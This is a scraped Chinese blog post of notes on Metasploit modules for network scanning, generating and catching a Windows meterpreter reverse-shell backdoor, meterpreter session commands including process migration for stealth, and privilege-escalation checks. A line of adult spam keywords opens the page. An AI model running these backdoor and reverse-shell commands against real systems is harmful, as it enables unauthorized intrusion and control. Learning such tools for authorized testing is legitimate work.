国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

msf常用模塊功能整理

這篇具有很好參考價值的文章主要介紹了msf常用模塊功能整理。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

更新中

一.基礎:

shell中直接輸入msfconsole開始運行

  • use +模塊路徑 使用模塊
  • search+模塊關鍵字 用來搜索模塊
  • back 返回主界面

模塊中:

  • info 查看模塊信息

  • show options 查看模塊設置項

  • show targets 顯示可選擇的target(targert更像是給你選項,你去細化攻擊細節(jié),但是明明目標機器是64位系統(tǒng),我選擇target為64攻擊不匹配,但是選擇86卻攻擊成功,為什么呢?這個問題解決了,因為生成木馬的時候會有生成64位還是32位的選項,默認是32位,也就是×86,因為木馬是×86,既然x86的木馬執(zhí)行成功了,選擇target自然也是x86

  • expolit/run 開始執(zhí)行

高級設置:

set AutoRunScript migrate -f 自動遷移進程

二.信息收集:

主機存活探測:auxiliary/scanner/discovery/arp_sweep ARP 掃描auxiliary/scanner/discovery/udp_sweep UDP 掃描auxiliary/scanner/netbios/nbname NETBIOS 掃描auxiliary/scanner/snmp/snmp_enum SNMP 掃描auxiliary/scanner/smb/smb_version SMB 掃描端口掃描:auxiliary/scanner/portscan/ack TCP ACK 端口掃描auxiliary/scanner/portscan/ftpbounce FTP bounce 端口掃描auxiliary/scanner/portscan/syn SYN 端口掃描auxiliary/scanner/portscan/tcp TCP 端口掃描auxiliary/scanner/portscan/xmas TCP XMas 端口掃描

使用方法:1.用內網的機器開個代理,使kali的流量可以到達內網,然后使用模塊掃描2.使用后門連接,通過session進行掃描3.在同一個內網里面可以直接掃描(一般不會有這種情況吧,除非我?guī)е娔X潛入目標地點)這三點適用于內網滲透的很多場景

三.滲透

3.1反向后門的使用

我的話:

反彈shell是等受害機器來連接我,所以我在這里的設置,不需要去設置受害機器的ip,因為只要受害機器知道來哪里找我就行了

生成反向后門:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.43 lport=18888 -f exe >gg.exe

高亮為可設置參數,

lhost是監(jiān)聽機ip地址(也就是攻擊者kali的ip地址)lport是監(jiān)聽端口(也就是攻擊者準備接收反彈回來的shell的那個端口)

監(jiān)聽后門:

use exploit/multi/handler

use exploit/multi/handler   #通過use選擇監(jiān)聽模塊
set payload windows/meterpreter/reverse_tcp  #選擇設置反彈shell的監(jiān)聽(這一步我有幾次忽略了,導致出現錯誤,連接失敗,所以這一步一定不要落下,設置監(jiān)聽的類型)
set lhost 192.168.43.43   #這里的ip和端口應該和后門代碼保持一致
set lport 18888
exploit   #開始執(zhí)行

meterpreter

獲取到shell后,會為被控制的機器開啟一個session(會話),msf可以同時監(jiān)聽多個session,并且在不同的session之間隨意切換,黑客在session中執(zhí)行命令等同于在目標主機執(zhí)行命令,也可以使用msf的攻擊模塊通過session對目標主機進行攻擊。在session中執(zhí)行命令的模式也被稱為meterpreter模式

session中:

 getuid #獲取當前用戶的權限吧,看演示里面一般是作這個用的
 migrate [進程號] #將后門進程遷移到其它進程里面,達到權限維持的效果(更不容易被發(fā)現)
 help        #可以顯示在meterpreter模式下可以操作的指令列表(一部分)
 search [-d dir] [-r recurse] -f pattern   #在被控制的機器內搜索文件
 shell   #得到終端
 background     #把session放置后臺
 ps    #列出所有進程,以及進程的信息(在這里可以看到pid,知道pid就可以使用kill來終止進程了)

session外:

session -l  #列出當前的所有session以及其信息
sessions -K   #關閉所有session連接,這里的k是大寫
sessions -k [指定session的id]  #殺死指定id的session
sessions [id號]  #根據id號進入不同的session

3.2提權

補丁查詢:

run post/windows/gather/enum_patches 查詢補丁信息use post/multi/recon/local_exploit_suggester 這個模塊可通過session查詢當前可以用來提權的exp,(可能會失靈)文章來源地址http://www.zghlxwxcb.cn/news/detail-440323.html

到了這里,關于msf常用模塊功能整理的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯(lián)網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • MSF中meterpreter和普通shell的區(qū)別

    MSF中meterpreter和普通shell的區(qū)別

    詳細命令參考這篇文章: msf之meterpreter命令 1.如上面所述,meterpreter比系統(tǒng)shell的功能更多豐富,功能很多,這里不進行嘗試了 2.在流量傳輸過程中,meterpreter會對信息進行加密,接下來我將使用wireshark進行對比試驗 這里的實驗環(huán)境我采用的是兩臺虛擬機,一臺kali(攻擊機)

    2023年04月16日
    瀏覽(27)
  • msf--Linux反彈shell--一看就會的實驗

    msf--Linux反彈shell--一看就會的實驗

    環(huán)境如下 vps :Linux ubuntu 4.15.0-180-generic (已經打開8989端口) win:Windows Feature Experience Pack 120.2212.4180.0(可以隨意) 靶機:Linux ubuntu 4.18.0-25-generic 過程如下 1.在vps里面生成木馬 ?msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=8989 -f elf asd ?2.將木馬下載到本機桌面 sz a

    2023年04月13日
    瀏覽(30)
  • 初學Verilog語言基礎筆記整理(實例點燈代碼分析)持續(xù)更新~

    初學Verilog語言基礎筆記整理(實例點燈代碼分析)持續(xù)更新~

    實例:點燈學習 剛接觸 Verilog ,作為一個硬件小白,只能嘗試著去理解,文章未完…持續(xù)更新。 參考博客文章: Verilog語言入門學習(1) Verilog語法 【 Verilog 】一文帶你了解 Verilog 基礎語法 - 子墨祭的文章 - 知乎 關于Verilog中的幾種賦值語句 這里抄點,那里扣點,整理了一

    2024年02月07日
    瀏覽(27)
  • 【51單片機實驗筆記】前篇(三) 模塊功能封裝匯總(持續(xù)更新)

    包含 常用 頭文件 , 宏定義 , 自定義類型 , 函數工具 等。 包含 常用 延時函數 。 通用函數 兼容 延時函數 。 包含 常用 LED 顯示函數。 主要實現了 延時法刷新 和 定時器法刷新 兩種方式 。提供 字符靜態(tài)寫入函數 、 整數寫入函數 、 浮點數寫入函數 和 字符串寫入函數

    2024年02月09日
    瀏覽(28)
  • 【PCL自學:目錄】PCL簡介及主要功能模塊介紹 (持續(xù)更新)

    【PCL自學:目錄】PCL簡介及主要功能模塊介紹 (持續(xù)更新)

    當你知道一切都不重要時,世界就是你的了。 ——《瑞克和莫蒂》S3E8 ??對于從事計算機視覺、機器視覺領域的從業(yè)者來說,OpenCV庫并不陌生,甚至是我們入門這個領域時的學習的第一個開源庫,如果說OpenCV是二維信息處理方面的工兵鏟,那PCL(Point Cloud Library)就是在三維

    2024年02月06日
    瀏覽(27)
  • 數睿通2.0功能更新:支持多版本 Flink 切換,新增數據標簽模塊

    數睿通2.0功能更新:支持多版本 Flink 切換,新增數據標簽模塊

    小伙伴們,大家好,數睿通 2.0 數據中臺迎來了 12 月份的更新,由于年底工作繁忙,所以本次更新內容稍微少了點,還望理解,本次更新內容主要包括: 數據開發(fā)多版本 Flink 支持,執(zhí)行任務的時候可以動態(tài)切換 Flink 版本,目前支持的版本有 1.14 和 1.16 新增數據標簽模塊,包

    2024年02月01日
    瀏覽(20)
  • 音視頻學習之ffmpeg常用基礎命令整理

    音視頻學習之ffmpeg常用基礎命令整理

    基于windows環(huán)境安裝好必要的ffmpeg后,對ffmpeg基礎命令進行一些了解: ? 有時候寫入MP4文件會不成功,改成flv就好 1:視頻裁剪: ? 2:文字水印: 編譯的時候需要支持 FreeType、FontConfig、iconv,系統(tǒng)中需要有相關的子庫, 在 FFmpeg 中增加純字母水印可以使用 drawtext 濾鏡進行支持

    2024年02月12日
    瀏覽(26)
  • 算法面試-深度學習基礎面試題整理-AIGC相關(2023.9.01開始,持續(xù)更新...)

    1、stable diffusion和GAN哪個好?為什么 ? Stable?diffusion是一種基于隨機微分方程的生成方法,它通過逐步增加噪聲來擾動原始圖像,直到完全隨機化。然后,它通過逐步減少噪聲來恢復圖像,同時使用一個神經網絡來預測下一步的噪聲分布。Stable Diffusion的優(yōu)點是可以在連續(xù)的潛

    2024年02月10日
    瀏覽(28)
  • 一圖看懂 setuptools 模塊:一個功能齊全、積極維護且穩(wěn)定的庫,旨在方便打包Python項目,資料整理+筆記(大全)

    一圖看懂 setuptools 模塊:一個功能齊全、積極維護且穩(wěn)定的庫,旨在方便打包Python項目,資料整理+筆記(大全)

    本文由 大俠(AhcaoZhu)原創(chuàng),轉載請聲明。 鏈接: https://blog.csdn.net/Ahcao2008 全文介紹python的 setuptools 模塊(一個功能齊全、積極維護且穩(wěn)定的庫,旨在方便打包Python項目)、函數、類及類的方法和屬性。 它通過代碼抓取并經AI智能翻譯和人工校對。 是一部不可多得的權威字典類

    2024年02月06日
    瀏覽(25)
  • 前端使用elementui開發(fā)后臺管理系統(tǒng)的常用功能(持續(xù)更新)

    前端使用elementui開發(fā)后臺管理系統(tǒng)的常用功能(持續(xù)更新)

    前言:本次的文章完全是自己開發(fā)中遇到的一些問題,經過不斷的修改終于完成的一些功能,當個快捷的查看手冊吧~ 功能描述:數據使用的若依的字典,或者是自定義數據,可以點擊每個選項進行選擇,取消選擇,也可以在已選擇進行清除和單個刪除 使用: @selection-change

    2024年02月09日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包